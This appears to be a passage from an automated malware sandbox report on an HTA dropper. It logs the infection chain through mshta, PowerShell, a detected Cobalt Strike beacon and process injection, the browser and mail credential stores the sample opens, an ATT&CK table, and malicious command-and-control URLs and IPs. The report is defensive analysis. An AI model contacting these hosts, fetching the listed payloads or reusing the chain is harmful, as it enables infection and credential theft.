                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000E.00000002.4513400219.00000000045C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.4513357875.0000000004570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2539781940.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2529118172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2551487251.0000000001D70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.4516216085.0000000006BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.4513529587.0000000003B10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                  Source: C:\Windows\SysWOW64\ieUnatt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000E.00000002.4513400219.00000000045C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.4513357875.0000000004570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2539781940.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2529118172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2551487251.0000000001D70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.4516216085.0000000006BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.4513529587.0000000003B10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information111
                  Scripting
                  Valid Accounts11
                  Command and Scripting Interpreter
                  111
                  Scripting
                  412
                  Process Injection
                  1
                  Masquerading
                  1
                  OS Credential Dumping
                  121
                  Security Software Discovery
                  Remote Services11
                  Email Collection
                  1
                  Encrypted Channel
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Exploitation for Client Execution
                  1
                  DLL Side-Loading
                  1
                  Abuse Elevation Control Mechanism
                  31
                  Virtualization/Sandbox Evasion
                  LSASS Memory2
                  Process Discovery
                  Remote Desktop Protocol1
                  Archive Collected Data
                  4
                  Ingress Tool Transfer
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts3
                  PowerShell
                  Logon Script (Windows)1
                  DLL Side-Loading
                  412
                  Process Injection
                  Security Account Manager31
                  Virtualization/Sandbox Evasion
                  SMB/Windows Admin Shares1
                  Data from Local System
                  4
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Deobfuscate/Decode Files or Information
                  NTDS1
                  Application Window Discovery
                  Distributed Component Object ModelInput Capture4
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Abuse Elevation Control Mechanism
                  LSA Secrets2
                  File and Directory Discovery
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                  Obfuscated Files or Information
                  Cached Domain Credentials114
                  System Information Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Side-Loading
                  DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1568883 Sample: maybecreatebesthingswithgre... Startdate: 05/12/2024 Architecture: WINDOWS Score: 100 57 www.yu12345.xyz 2->57 59 www.tophcom.online 2->59 61 17 other IPs or domains 2->61 91 Suricata IDS alerts for network traffic 2->91 93 Malicious sample detected (through community Yara rule) 2->93 95 Antivirus detection for URL or domain 2->95 99 12 other signatures 2->99 13 mshta.exe 1 2->13         started        signatures3 97 Performs DNS queries to domains with low reputation 57->97 process4 signatures5 113 Suspicious command line found 13->113 115 PowerShell case anomaly found 13->115 16 cmd.exe 1 13->16         started        process6 signatures7 71 Detected Cobalt Strike Beacon 16->71 73 Suspicious powershell command line found 16->73 75 Wscript starts Powershell (via cmd or directly) 16->75 77 PowerShell case anomaly found 16->77 19 powershell.exe 3 45 16->19         started        24 conhost.exe 16->24         started        process8 dnsIp9 63 172.245.123.3, 49707, 49759, 80 AS-COLOCROSSINGUS United States 19->63 51 verygreattrafficwi...kingskilltobego.vbS, Unicode 19->51 dropped 53 C:\Users\user\AppData\...\dtaz5slk.cmdline, Unicode 19->53 dropped 101 Loading BitLocker PowerShell Module 19->101 26 wscript.exe 1 19->26         started        29 csc.exe 3 19->29         started        file10 signatures11 process12 file13 105 Detected Cobalt Strike Beacon 26->105 107 Suspicious powershell command line found 26->107 109 Wscript starts Powershell (via cmd or directly) 26->109 111 2 other signatures 26->111 32 powershell.exe 15 16 26->32         started        35 firefox.exe 26->35         started        55 C:\Users\user\AppData\Local\...\dtaz5slk.dll, PE32 29->55 dropped 37 cvtres.exe 1 29->37         started        signatures14 process15 signatures16 79 Writes to foreign memory regions 32->79 81 Injects a PE file into a foreign processes 32->81 39 aspnet_compiler.exe 32->39         started        42 conhost.exe 32->42         started        process17 signatures18 103 Maps a DLL or memory area into another process 39->103 44 lSomfUdjbC.exe 39->44 injected process19 dnsIp20 65 wmnfkj.a.1112dns.com 154.82.100.177, 50023, 50024, 50025 ROOTNETWORKSUS Seychelles 44->65 67 www.tophcom.online 162.213.249.216, 50005, 50006, 50008 NAMECHEAP-NETUS United States 44->67 69 5 other IPs or domains 44->69 117 Found direct / indirect Syscall (likely to bypass EDR) 44->117 48 ieUnatt.exe 13 44->48         started        signatures21 process22 signatures23 83 Tries to steal Mail credentials (via file / registry access) 48->83 85 Tries to harvest and steal browser information (history, passwords, etc) 48->85 87 Modifies the context of a thread in another process (thread injection) 48->87 89 2 other signatures 48->89

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  maybecreatebesthingswithgreatnicewhichgivenbreakingthingstobe.hta18%ReversingLabsScript-WScript.Trojan.Asthma
                  maybecreatebesthingswithgreatnicewhichgivenbreakingthingstobe.hta25%VirustotalBrowse
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  www.inastra.online0%VirustotalBrowse
                  www.tophcom.online1%VirustotalBrowse
                  SourceDetectionScannerLabelLink
                  http://www.healthyloveforall.net/566f/?ZrE=81geMJs5jQmVeK4hwDBPKHBGvn0Tm7ZwgeOmc9jTU6Fy38DzzGnJ98DUeY7D2pyu2XwXZT+7XMaW7aMNMrEzQeD/F7FTjsbI9QNHnkd6Arn6dVLur5eWw9nVs6w/1EYvnvYCbSs=&Jr=tnaxxtx0%Avira URL Cloudsafe
                  http://crl.microsoft0%Avira URL Cloudsafe
                  http://www.inastra.online/Toyota_Avensis.cfm?fp=KxtlUTPhWB%2Fwpu6zuo7h6FGLFrhSVbAgHpvfpKEXKXNi6iOlK8100%Avira URL Cloudmalware
                  http://www.Inastra.online100%Avira URL Cloudmalware
                  http://www.yu12345.xyz/mnl8/100%Avira URL Cloudmalware
                  http://www.chalet-tofane.net/obbp/100%Avira URL Cloudmalware
                  http://www.inastra.online/Vintage_Car_Auctions.cfm?fp=KxtlUTPhWB%2Fwpu6zuo7h6FGLFrhSVbAgHpvfpKEXKXNi100%Avira URL Cloudmalware
                  http://www.deikamalaharris.info/lrgf/0%Avira URL Cloudsafe
                  http://www.qmmkl.buzz/e3vj/?Jr=tnaxxtx&ZrE=Apw/qEhkM9PBzv16DC8g1MSIQhvVD2Vj01FPVXV4CfqJVQ1J3uaJteAUq9BD3RYf6FzZ09NLBogJcHSO0hmFge+YoOQSOFa9DG3d+S6Zcyz3+NwsM7PgNDQLFA8HvIbfdwoJPYw=0%Avira URL Cloudsafe
                  http://172.245.123.3/784/CAMRRAM.txt0%Avira URL Cloudsafe
                  http://www.chalet-tofane.net:80/obbp/?ZrE=q8u4kFvwJtfA9Pl2Tc7XzAnO7IWA4JmOGaMFAF6owipiqs4LNofKQ6whCX100%Avira URL Cloudmalware
                  http://www.healthyloveforall.net/566f/0%Avira URL Cloudsafe
                  https://www.ngxfence.com0%Avira URL Cloudsafe
                  http://www.deikamalaharris.info/lrgf/?ZrE=hLl6Iyyv1/RGmZWnRJ8bmiMJmTP6dhK4gm2wi1fTCYCBRK5IakRwGOHrv3dZYUH5yIXieuiAG/czDQPLmWqEbLilSzY96+fF8eVAog2wOE9edOY1dT6GtuOhq9bHDkAhjeaZiB4=&Jr=tnaxxtx0%Avira URL Cloudsafe
                  http://172.245.123.3/784/verygreattrafficwithniceworkingskilltobegood.tIF0%Avira URL Cloudsafe
                  http://www.ks1x7i.vip/dlcs/?ZrE=w6QiAdP8awPLsa7eBVc39wzje3KOivPaseEO6V4cXiHKOPXUCZsKQLVdGPqPnVEzm93wkYEJdOAjyg/exCmJYaQq4xVLxeGT88y8VuPgcLQNhWCgEoW6IBmijKvaz1FJHcFNtNE=&Jr=tnaxxtx0%Avira URL Cloudsafe
                  http://www.chalet-tofane.net/obbp/?ZrE=q8u4kFvwJtfA9Pl2Tc7XzAnO7IWA4JmOGaMFAF6owipiqs4LNofKQ6whCXFZjhm4RzxlyIFmCbk02gBov1+7TAel+jFtI3CD3Jdw5DP3HME6qP+mS3NVD/GMMnbyFe0QVN3VaJo=&Jr=tnaxxtx100%Avira URL Cloudmalware
                  http://www.yu12345.xyz/mnl8/?ZrE=RGOQJd/YEggQptEich3q6d0bfn/irFBnx+ZpwzxB5TUNCs3vZOAWTRyo0cim1/zDkhtz3OYESkByNsQcxwF9aubDKJHPAYECM7rOvY9yH/ydWUGi/0eSoW1GLP2ssLvhhZDeTZQ=&Jr=tnaxxtx100%Avira URL Cloudmalware
                  http://www.inastra.online/display.cfm100%Avira URL Cloudmalware
                  http://www.tophcom.online/vfa8/?ZrE=yTDEjSVS0lCRYcLIcrIR3TcCYEVKOYUzZB0jcnDiZYtjnJOoqq5Z+2u71ELG2uGtiKDGExTS3yLoYSdFQgyUiMInkJIsAAFuKMZReKrfZcHWOCruByZu1/Jk+op4CslnIJH3FWE=&Jr=tnaxxtx0%Avira URL Cloudsafe
                  http://pesterbdd.com/images/Pester.png0%Avira URL Cloudsafe
                  http://www.ortenckt.online/aj1a/0%Avira URL Cloudsafe
